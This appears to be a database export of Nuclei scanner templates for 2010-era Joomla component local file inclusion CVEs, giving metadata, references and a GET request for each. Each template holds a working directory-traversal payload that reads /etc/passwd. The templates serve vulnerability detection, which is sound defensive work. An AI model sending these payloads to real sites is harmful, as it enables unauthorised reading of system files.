- \"{{BaseURL}}/status?full=true\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"JVM\"\n - \"memory\"\n - \"localhost/\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950", "hash": "91eb1b334fff9658426a9250632e890c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e83" }, "name": "CVE-2010-1461.yaml", "content": "id: CVE-2010-1461\n\ninfo:\n name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! application.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12232\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1461\n - http://www.exploit-db.com/exploits/12232\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1461\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.73149\n cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gogoritas\n product: com_photobattle\n tags: cve,cve2010,joomla,lfi,photo,edb,gogoritas\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207a92c230e02820f5272be13d2ee12a3e2739ac81ac8868dfbbe2ff407522df0c0220517ba0c636efa561e00528f86bcb0cdb861bc0e5382c72f4cb8f11b5fffc3b89:922c64590222798bb761d5b6d8e72950", "hash": "30954e4ba33e33276ba2c4bd2fb2326e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e84" }, "name": "CVE-2010-1469.yaml", "content": "id: CVE-2010-1469\n\ninfo:\n name: Joomla! Component JProject Manager 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12146\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1469\n - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt\n - http://www.exploit-db.com/exploits/12146\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1469\n cwe-id: CWE-22\n epss-score: 0.00813\n epss-percentile: 0.81406\n cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ternaria\n product: com_jprojectmanager\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,ternaria\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206c63f224a283f97a55ae4941e39f19ae06e9761cf123943f1b4d394ecef11ea9022100d2900835201e1b12398af58927fbaada9d98b609932bfc9f70d7c6263a16a705:922c64590222798bb761d5b6d8e72950", "hash": "9268ee317f5e44caf8273a5e35605487", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e85" }, "name": "CVE-2010-1470.yaml", "content": "id: CVE-2010-1470\n\ninfo:\n name: Joomla! Component Web TV 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12166\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1470\n - http://www.exploit-db.com/exploits/12166\n - http://www.vupen.com/english/advisories/2010/0858\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1470\n cwe-id: CWE-22\n epss-score: 0.04616\n epss-percentile: 0.92373\n cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dev.pucit.edu.pk\n product: com_webtv\n tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022005af39fb89c8d8753e1bcb87009d6d4d1de2cb594ed2c7fd92db1d9971237aeb022100bec720c951ec411c59b60dbf4113ab4a22c3e29ca90e8e253aab3e7e0dec4e37:922c64590222798bb761d5b6d8e72950", "hash": "ab1310da86b8bbcb3be857e731f0b44b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e86" }, "name": "CVE-2010-1471.yaml", "content": "id: CVE-2010-1471\n\ninfo:\n name: Joomla! Component Address Book 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! Component Address Book or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12170\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1471\n - http://www.vupen.com/english/advisories/2010/0862\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1471\n cwe-id: CWE-22\n epss-score: 0.05684\n epss-percentile: 0.93171\n cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: b-elektro\n product: com_addressbook\n tags: cve,cve2010,joomla,lfi,edb,b-elektro\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ce9830af0a126d6aae7b0cbe9b7598011f30691e6f9066386c81c9fb4bf3c1bc022014f94fe6e238d285a780454bb05c33859277fe46440a3a38ce33dd5a9d376175:922c64590222798bb761d5b6d8e72950", "hash": "f1b7b4ca658e6853cec70b13c0950c71", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e87" }, "name": "CVE-2010-1472.yaml", "content": "id: CVE-2010-1472\n\ninfo:\n name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12167\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1472\n - http://www.exploit-db.com/exploits/12167\n - http://www.vupen.com/english/advisories/2010/0859\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1472\n cwe-id: CWE-22\n epss-score: 0.05684\n epss-percentile: 0.93171\n cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kazulah\n product: com_horoscope\n tags: cve,cve2010,joomla,lfi,edb,kazulah\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022058bbc0b32a0debf917a4482c1d2aaf6dd8d22f0d12d301863ab6f832fa4b7dc6022100cd4e71908a61f85fe54f802d0d68887c7e90055e562e68608ec4b42cb4de3736:922c64590222798bb761d5b6d8e72950", "hash": "ea1dff7934245b569d15bc2086959336", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e88" }, "name": "CVE-2010-1473.yaml", "content": "id: CVE-2010-1473\n\ninfo:\n name: Joomla! Component Advertising 0.25 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12171\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1473\n - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1473\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80104\n cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: johnmccollum\n product: com_advertising\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,johnmccollum\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100caea4647de08403d53042f0568175efd2710e43a5d7e4962fcdb653206899ef802204d6c39e2e96c51b1626db9d90b0417e114debda8ef2844386f4faaa68630e512:922c64590222798bb761d5b6d8e72950", "hash": "a37401c90f32787ac40bf46266acea44", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e89" }, "name": "CVE-2010-1474.yaml", "content": "id: CVE-2010-1474\n\ninfo:\n name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! Component Sweetykeeper or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12182\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1474\n - http://www.exploit-db.com/exploits/12182\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57662\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1474\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.83996\n cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: supachai_teasakul\n product: com_sweetykeeper\n tags: cve2010,cve,joomla,lfi,edb,supachai_teasakul\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210092cb1f73ab7dcae152bc21fe109528bd68ddf3cb5c508c1c4ba81eb03a062e0f022100d32c234d25d1101db43416910efd4e3e67f536d43d1ed0a150d56605181bc34f:922c64590222798bb761d5b6d8e72950", "hash": "625cb26876db9d065857ef94fcb98f69", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8a" }, "name": "CVE-2010-1475.yaml", "content": "id: CVE-2010-1475\n\ninfo:\n name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n The LFI vulnerability can allow an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.\n remediation: |\n Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12147\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1475\n - http://www.exploit-db.com/exploits/12147\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1475\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.83996\n cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ternaria\n product: com_preventive\n tags: cve,cve2010,edb,joomla,lfi,ternaria\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b79b632e011312d4f390807f69c5a574e87dd7c7f8e5645c0084a40ac2aaf84a0220638374eeade62a6c858f74603e82a9ff1c3f522a73e5268cfce3425a2bd72ae6:922c64590222798bb761d5b6d8e72950", "hash": "6e3e7cd7ef9f84e9a524034b6f9cb80c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8b" }, "name": "CVE-2010-1476.yaml", "content": "id: CVE-2010-1476\n\ninfo:\n name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12150\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1476\n - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt\n - http://www.alphaplug.com/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1476\n cwe-id: CWE-22\n epss-score: 0.03527\n epss-percentile: 0.90668\n cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: alphaplug\n product: com_alphauserpoints\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,alphaplug\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e223bbab6d530ae6a44d3bd78a373853c5148f44c8fc760b86463968a99c39260220014aad890aabb37a243d84a97dc63c543133a8974a8c00e2b56a558e85a93be3:922c64590222798bb761d5b6d8e72950", "hash": "a1d94f17f552450e02b65f7e39957301", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8c" }, "name": "CVE-2010-1478.yaml", "content": "id: CVE-2010-1478\n\ninfo:\n name: Joomla! Component Jfeedback 1.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12145\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1478\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1478\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ternaria\n product: com_jfeedback\n tags: cve,cve2010,joomla,lfi,edb,ternaria\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f8a369f60457a7ad48ee08f06532f8ea4030fe25b2fe4d735fdfd1442f512d9c022100de537a9f67ca16a85f4b2b73a6f4acb836f318fa80b2cecbf785fd5d92651037:922c64590222798bb761d5b6d8e72950", "hash": "4c0892480b9a2f3a820434ede67edf36", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8d" }, "name": "CVE-2010-1491.yaml", "content": "id: CVE-2010-1491\n\ninfo:\n name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12318\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1491\n - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt\n - http://www.exploit-db.com/exploits/12318\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1491\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mms.pipp\n product: com_mmsblog\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,mms.pipp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e0a41e3ef2fff8d4281685f568b953c58721b3ae23726e41f4687da5de910e64022100bb7d92ae5fafc295c7b580db91dfab2e82e1d68946435e325a1e1d8bc6887978:922c64590222798bb761d5b6d8e72950", "hash": "ac2c225112b3b6d183b042ef683956d5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8e" }, "name": "CVE-2010-1494.yaml", "content": "id: CVE-2010-1494\n\ninfo:\n name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12113\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1494\n - http://www.exploit-db.com/exploits/12113\n - http://www.awdwall.com/index.php/awdwall-updates-logs-\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57693\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1494\n cwe-id: CWE-22\n epss-score: 0.01827\n epss-percentile: 0.86946\n cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: awdsolution\n product: com_awdwall\n tags: cve,cve2010,joomla,lfi,edb,awdsolution\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022078af0a2572ae5f8b2c1663f51eada15aaf88e88ddd86c86885239309dfc1cad3022004c0a80a0505a5b96aa016ae9b7c502555783290a05b5589d8a9677dcabefefe:922c64590222798bb761d5b6d8e72950", "hash": "f2d96647c3387a0c379b563b76173015", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e8f" }, "name": "CVE-2010-1495.yaml", "content": "id: CVE-2010-1495\n\ninfo:\n name: Joomla! Component Matamko 1.01 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12286\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1495\n - http://www.vupen.com/english/advisories/2010/0929\n - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1495\n cwe-id: CWE-22\n epss-score: 0.04503\n epss-percentile: 0.92278\n cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: matamko\n product: com_matamko\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,matamko\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100db80873c4e826e771eec3d90cc217edd2052bb04999b81c92e730edfdd70ccee02204a0f81a67a7a8065fe6aa1db38bd12b03921b8796c10a8adbe1e151d35643bee:922c64590222798bb761d5b6d8e72950", "hash": "3b2598d45d3a646b909b3e06f59debcc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e90" }, "name": "CVE-2010-1531.yaml", "content": "id: CVE-2010-1531\n\ninfo:\n name: Joomla! Component redSHOP 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12054\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1531\n - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt\n - http://redcomponent.com/redshop/redshop-changelog\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57512\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1531\n cwe-id: CWE-22\n epss-score: 0.01815\n epss-percentile: 0.86892\n cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: redcomponent\n product: com_redshop\n tags: cve2010,cve,lfi,edb,packetstorm,joomla,redcomponent\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e5477149f1e34b88e3dd7d962a23c967bc272e94ffeae18055a5a80d9e051cc602210086357c7ed36299ed6887410f4e2b5c11f76dc8fc2ad89d7197281be08c89e9e0:922c64590222798bb761d5b6d8e72950", "hash": "b684db0fb1ffb1c36ecd0403ffb2bd87", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e91" }, "name": "CVE-2010-1532.yaml", "content": "id: CVE-2010-1532\n\ninfo:\n name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12118\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1532\n - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1532\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: givesight\n product: com_powermail\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,givesight\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210093ee4b75fd03b95c7cf1b62869f48b19b4cd257e9b6ee4e7a9ddd9ebdeba739f022100d1cd3032f304650a027ad4a1645ed98ff12691f89b7e9116d244291df5398606:922c64590222798bb761d5b6d8e72950", "hash": "d5ebaa36900233c5701b2ca5942f4f55", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e92" }, "name": "CVE-2010-1533.yaml", "content": "id: CVE-2010-1533\n\ninfo:\n name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12142\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1533\n - http://www.exploit-db.com/exploits/12142\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: 